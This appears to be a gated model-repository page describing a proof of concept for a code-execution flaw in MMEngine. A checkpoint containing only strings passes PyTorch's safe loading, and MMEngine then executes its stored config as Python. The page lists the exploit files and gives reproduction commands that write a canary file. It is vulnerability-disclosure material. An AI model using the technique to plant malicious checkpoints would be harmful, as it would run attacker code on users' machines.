You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

MMEngine D61 checkpoint config execution PoC

This repository contains a private/gated proof of concept for a vulnerability in OpenMMLab MMEngine versions >=0.5.0, <=0.10.7.

The issue is not a pickle-gadget exploit. The malicious .pth checkpoint contains only primitive dict/string values and can pass:

torch.load("evil.pth", map_location="cpu", weights_only=True)

Execution occurs afterward when MMEngine recovers checkpoint["message_hub"]["runtime_info"]["cfg"] and parses it as Python via Config.fromstring(..., file_format=".py").

Files

  • evil.pth - generated proof-of-concept checkpoint.
  • generate_malicious.py - regenerates evil.pth.
  • load_driver.py - loads the checkpoint with weights_only=True and triggers MMEngine config parsing.
  • requirements.txt - tested dependencies.

Reproduction

python -m pip install -r requirements.txt
python load_driver.py --checkpoint evil.pth --canary /tmp/d61-mmengine-canary

Expected output includes:

loaded_type=dict
cfg_type=str
state_dict_type=dict
canary_exists=True
canary_contents=d61

Affected versions

  • mmengine >=0.5.0, <=0.10.7
  • Patched version: none known at submission time.
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support